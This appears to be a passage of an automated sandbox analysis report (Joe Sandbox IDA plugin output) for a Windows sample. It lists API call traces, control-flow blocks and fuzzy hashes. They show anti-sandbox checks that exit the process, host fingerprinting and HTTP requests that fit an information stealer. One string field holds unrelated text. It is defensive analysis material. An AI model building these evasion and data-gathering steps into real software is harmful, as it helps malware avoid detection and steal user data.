                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F15B0), ref: 00146612
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F15F8), ref: 0014662A
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F15C8), ref: 00146642
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F91A8), ref: 0014665B
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013E6588), ref: 00146673
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013E6428), ref: 0014668B
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1640), ref: 001466A4
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1610), ref: 001466BC
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1628), ref: 001466D4
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1550), ref: 001466ED
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013E65A8), ref: 00146705
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1568), ref: 0014671D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00141DFF
                            • ExitProcess.KERNEL32 ref: 00141E37
                            • GetSystemInfo.KERNEL32(?), ref: 00141E41
                            • ExitProcess.KERNEL32 ref: 00141E4F
                              • Part of subcall function 00121030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
                              • Part of subcall function 00121030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
                              • Part of subcall function 00121030: ExitProcess.KERNEL32 ref: 00121058
                              • Part of subcall function 001210C0: GlobalMemoryStatusEx.KERNEL32 ref: 001210EA
                              • Part of subcall function 001210C0: ExitProcess.KERNEL32 ref: 00121114
                            • GetUserDefaultLangID.KERNEL32 ref: 00141E5F
                            • ExitProcess.KERNEL32 ref: 00141E82
                            • ExitProcess.KERNEL32 ref: 00141EB1
                            • lstrlen.KERNEL32(013F9228), ref: 00141EBE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00141EE5
                            • lstrcat.KERNEL32(00000000,013F9228), ref: 00141EED
                            • lstrlen.KERNEL32(00154BA0), ref: 00141EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141F18
                            • lstrcat.KERNEL32(00000000,00154BA0), ref: 00141F24
                            • lstrlen.KERNEL32(00000000), ref: 00141F33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141F59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141F64
                            • lstrlen.KERNEL32(00154BA0), ref: 00141F6F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141F8C
                            • lstrcat.KERNEL32(00000000,00154BA0), ref: 00141F98
                            • lstrlen.KERNEL32(00000000), ref: 00141FA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00141FC9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00141FD4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: d985c614e81962f3c9a3c5d8885e8fc113618a6ecd076fa1a9e07b81afc059da
                            • Instruction ID: 0b5792dc3c241b57a247c1a3083953d59baa36af915343f1332e7a0955b09079
                            • Opcode Fuzzy Hash: d985c614e81962f3c9a3c5d8885e8fc113618a6ecd076fa1a9e07b81afc059da
                            • Instruction Fuzzy Hash: 5C71AF31901326FBDB22ABB0EC89B6E7BBDAF15716F040415F906A71B1DF309946CB60

                            Control-flow Graph

                            • Control-flow graph image not rendered. Recovered basic blocks of function 142910: 142910-142953 GetWindowsDirectoryA (with optional 142955); 14295c-1429ba GetVolumeInformationA; 1429bc-1429c2 loop head with 1429c4-1429d7 looping back; 1429d9-1429f0 GetProcessHeap, RtlAllocateHeap; 1429f6-142a14 wsprintfA (or the 1429f2-1429f4 branch); 142a2b-142a42 call 1473f0.
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0014294B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00139506,00000000,00000000,00000000,00000000), ref: 0014297C
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001429DF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 001429E6
                            • wsprintfA.USER32 ref: 00142A0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 7fc9539f4052a222af69133e6c91a0b39778f33f7c954e6ec6c6187742f3f538
                            • Instruction ID: 3efc9a6f4cf2927bfba20b00e8bc123bba626d7387d94cdaf37612814639c2c5
                            • Opcode Fuzzy Hash: 7fc9539f4052a222af69133e6c91a0b39778f33f7c954e6ec6c6187742f3f538
                            • Instruction Fuzzy Hash: 00318FB19082199FCB15DFB8D985AEFBFBCEF58301F50416AE515F7660E3348A408BA1

                            Control-flow Graph

                            • Control-flow graph image not rendered. Recovered basic blocks of function 124a60: 124a60-124afc RtlAllocateHeap; optional 124afe-124b03 and 124b06-124b78; 124b7a-124bbe VirtualProtect.
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00124AA2
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00124BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 0177b92a41f6bfb69e9c067b4f982d6aaa60fbea19a48d4d9cdab2304ec6def9
                            • Instruction ID: 4b53875824e8718cc1866417cfb9520fbb6faebd8819bf650699d5870b84b66a
                            • Opcode Fuzzy Hash: 0177b92a41f6bfb69e9c067b4f982d6aaa60fbea19a48d4d9cdab2304ec6def9
                            • Instruction Fuzzy Hash: 81310910B8022CF7C6326BB66C47BAF7E5DDF4C75EB000256FC385A1818BB054C889E1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00142C3F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142C46
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00142C5A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 5d9b16e4df7a59c70507b9d1c00b75bb3c27f553e1209ab1937583cf83080036
                            • Instruction ID: 3008a959a123f25dc4f81862fefef6f3c8889b04e2651d7232c5de22db906052
                            • Opcode Fuzzy Hash: 5d9b16e4df7a59c70507b9d1c00b75bb3c27f553e1209ab1937583cf83080036
                            • Instruction Fuzzy Hash: 8CF0B4B1A44304EBD700DF88DD49B9ABBBCFB08B22F000216F914E3290D774190486A1
                            APIs
                            • lstrlen.KERNEL32(0014CFF4), ref: 0013F3B5
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F3D1
                            • lstrlen.KERNEL32(0014CFF4), ref: 0013F3DC
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F3F5
                            • lstrlen.KERNEL32(0014CFF4), ref: 0013F400
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F419
                            • lstrcpy.KERNEL32(00000000,00154FA4), ref: 0013F43E
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F46C
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F4A0
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013F4D0
                            • lstrlen.KERNEL32(013E6388), ref: 0013F4F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 157c8488c1624756955cd600ef9c31b81d0d15edb233344fa75647f81993c45c
                            • Instruction ID: 823c2fa2bfa1b127e941d6eac376a6d8adfc7345c7e38f6273ef4bd790527b0f
                            • Opcode Fuzzy Hash: 157c8488c1624756955cd600ef9c31b81d0d15edb233344fa75647f81993c45c
                            • Instruction Fuzzy Hash: 55A25970D01726DFCB21DF69D949A5ABBF8AF44315F18817EE8099B261EB31DC42CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001401E3
                            • lstrlen.KERNEL32(0014CFF4), ref: 0014028D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001402B1
                            • lstrlen.KERNEL32(0014CFF4), ref: 001402BC
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001402E0
                            • lstrlen.KERNEL32(0014CFF4), ref: 001402EB
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0014030F
                            • lstrlen.KERNEL32(0014CFF4), ref: 0014032A
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00140359
                            • lstrlen.KERNEL32(0014CFF4), ref: 00140364
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00140393
                            • lstrlen.KERNEL32(0014CFF4), ref: 0014039E
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001403D6
                            • lstrlen.KERNEL32(0014CFF4), ref: 00140420
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00140458
                            • lstrcpy.KERNEL32(00000000,?), ref: 0014076B
                            • lstrlen.KERNEL32(013E64C8), ref: 0014077B
                            • lstrcpy.KERNEL32(00000000,?), ref: 001407A7
                            • lstrcat.KERNEL32(00000000,?), ref: 001407B3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001407DE
                            • lstrlen.KERNEL32(013FE2E0), ref: 001407F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0014081C
                            • lstrcat.KERNEL32(00000000,?), ref: 00140828
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00140851
                            • lstrlen.KERNEL32(013E6668), ref: 00140868
                            • lstrcpy.KERNEL32(00000000,?), ref: 00140899
                            • lstrcat.KERNEL32(00000000,?), ref: 001408A5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001408D6
                            • lstrcpy.KERNEL32(00000000,013F90A8), ref: 0014091B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 0014094F
                            • lstrcpy.KERNEL32(00000000,013FE5B0), ref: 001409B7
                            • lstrcpy.KERNEL32(00000000,013F9058), ref: 00140A28
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00140A9F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00140AF8
                            • lstrcpy.KERNEL32(00000000,013F8FF8), ref: 00140BC8
                              • Part of subcall function 001224E0: lstrcpy.KERNEL32(00000000,?), ref: 00122528
                              • Part of subcall function 001224E0: lstrcpy.KERNEL32(00000000,?), ref: 0012254E
                              • Part of subcall function 001224E0: lstrcpy.KERNEL32(00000000,?), ref: 00122577
                            • lstrcpy.KERNEL32(00000000,013F8EF8), ref: 00140C9E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00140D51
                            • lstrcpy.KERNEL32(00000000,013F8EF8), ref: 00140F28
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: f97ed4557300f206f02eb791f30137e6af86ba1df65efd4dfbe2176cd94f300c
                            • Instruction ID: f53344ae3c13fe5edfb826d7eef958c1624b535ed7cf3b516190ca9966fe4de0
                            • Opcode Fuzzy Hash: f97ed4557300f206f02eb791f30137e6af86ba1df65efd4dfbe2176cd94f300c
                            • Instruction Fuzzy Hash: 96E27C70A05341DFD735DF29D489B6ABBE0BF88314F58856EE48D8B262DB31D885CB42

                            Control-flow Graph (legend: Executed / Not Executed) for the function at 00126C40 (basic blocks 126c40-126ee0); the rendered graph is not reproduced here, its API calls are listed under APIs below.
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00126C6F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126CC2
                            • InternetOpenA.WININET(0014CFF4,00000001,00000000,00000000,00000000), ref: 00126CD5
                            • StrCmpCA.SHLWAPI(?,013FE938), ref: 00126CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,013FE5C8,00000000,00000000,-00400100,00000000), ref: 00126D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00126D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00126D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00126DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00126DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00126E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00126E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00126E8E
                            • InternetCloseHandle.WININET(?), ref: 00126E98
                            • InternetCloseHandle.WININET(00000000), ref: 00126EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00126EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: f9c94cc17af5747aa1f969224ed76ac8be728313296ba65103598a88454e36b1
                            • Instruction ID: 872cae5b93af5c15e02b0fe50de30970949e0f2175147ab38e8111037e04bff7
                            • Opcode Fuzzy Hash: f9c94cc17af5747aa1f969224ed76ac8be728313296ba65103598a88454e36b1
                            • Instruction Fuzzy Hash: 6381B271A0132AABDB21DFA4EC45FAE77B8EF48701F140169F905E72D0DB74AD548B90
                            APIs
                            • lstrlen.KERNEL32(013E6388), ref: 0013F4F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F583
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F5A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F65B
                            • lstrcpy.KERNEL32(00000000,013E6388), ref: 0013F69B
                            • lstrcpy.KERNEL32(00000000,013F9238), ref: 0013F6CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F77E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0013F7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F82C
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F87A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0013F8F8
                            • lstrlen.KERNEL32(013F9198), ref: 0013F926
                            • lstrcpy.KERNEL32(00000000,013F9198), ref: 0013F951
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013F973
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F9C4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0013FC12
                            • lstrlen.KERNEL32(013F9128), ref: 0013FC40
                            • lstrcpy.KERNEL32(00000000,013F9128), ref: 0013FC6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013FC8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013FCDE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: c86e1273b04a7403fa7ffd5fbf54079b67faf0eb0ad100a0a2f4298310be7b5e
                            • Instruction ID: c5078c664247b549e4f8561b0a05863900dd9ab62b0639d07aa379a03840b316
                            • Opcode Fuzzy Hash: c86e1273b04a7403fa7ffd5fbf54079b67faf0eb0ad100a0a2f4298310be7b5e
                            • Instruction Fuzzy Hash: 7BF11670A01712DFCB25CF69D848B69B7E9BF44315F1881BEE8099B2A1E732DC42CB50

                            Control-flow Graph (legend: Executed / Not Executed) for the function at 00138DF0 (basic blocks 138df0-13903f, calling StrCmpCA, ExitProcess, lstrlen and lstrcpy); the rendered graph is not reproduced here.
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: cd04d5834d886ffeeb079c0bf7ad7dd7fa5c2dcfc352113a499cd2bcb66543a3
                            • Instruction ID: 73d37f09e89856275fb62e10e4b39241e2a4f5defd6fcbb90d2d17bacd8ce6ab
                            • Opcode Fuzzy Hash: cd04d5834d886ffeeb079c0bf7ad7dd7fa5c2dcfc352113a499cd2bcb66543a3
                            • Instruction Fuzzy Hash: C5518BB4604711EFCB399F75ED84A6AB6F8BB4470AF10082DF442D7650D7B4E481AB10

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 124bc0-124bce 2794 124bd0-124bd5 2793->2794 2794->2794 2795 124bd7-124c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 122a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00124BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00124C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00124C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00124C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00124C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 2906766ae90932166d512a9da4bc704983719be1d1906771b6f6b7e1de2e1834
                            • Instruction ID: 81c3e303a7cf2c6dbe6356faa79aa6fcf344145102ead6d26ddbc36a59649fd8
                            • Opcode Fuzzy Hash: 2906766ae90932166d512a9da4bc704983719be1d1906771b6f6b7e1de2e1834
                            • Instruction Fuzzy Hash: 1C014071D00218AFDB10DFA8EC45B9EBBB8EB19325F004126F954E7390DB7499058FD4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 121030-121055 GetCurrentProcess VirtualAllocExNuma 2799 121057-121058 ExitProcess 2798->2799 2800 12105e-12107b VirtualAlloc 2798->2800 2801 121082-121088 2800->2801 2802 12107d-121080 2800->2802 2803 1210b1-1210b6 2801->2803 2804 12108a-1210ab VirtualFree 2801->2804 2802->2801 2804->2803
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
                            • ExitProcess.KERNEL32 ref: 00121058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0012106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 001210AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: fbebc40960462c69e8e1de072f86dbdc6492d8cd01850d01988018dbde7c6a8b
                            • Instruction ID: ca6c9a59d900d0779b7b2375192031280803beb612401f7976c602daed8dbbd7
                            • Opcode Fuzzy Hash: fbebc40960462c69e8e1de072f86dbdc6492d8cd01850d01988018dbde7c6a8b
                            • Instruction Fuzzy Hash: C701F471740314BBE7204B657C5AF6B77EDA794B12F308415F704E72D0DAB1EE008668

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 13f070-13f095 call 122930 2808 13f097-13f09f 2805->2808 2809 13f0a9-13f0ad call 126c40 2805->2809 2808->2809 2810 13f0a1-13f0a3 lstrcpy 2808->2810 2812 13f0b2-13f0c8 StrCmpCA 2809->2812 2810->2809 2813 13f0f1-13f0f8 call 122a20 2812->2813 2814 13f0ca-13f0e2 call 122a20 call 122930 2812->2814 2820 13f100-13f108 2813->2820 2823 13f125-13f180 call 122a20 * 10 2814->2823 2824 13f0e4-13f0ec 2814->2824 2820->2820 2822 13f10a-13f117 call 122930 2820->2822 2822->2823 2830 13f119 2822->2830 2824->2823 2826 13f0ee-13f0ef 2824->2826 2829 13f11e-13f11f lstrcpy 2826->2829 2829->2823 2830->2829
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013F0A3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 0013F0BE
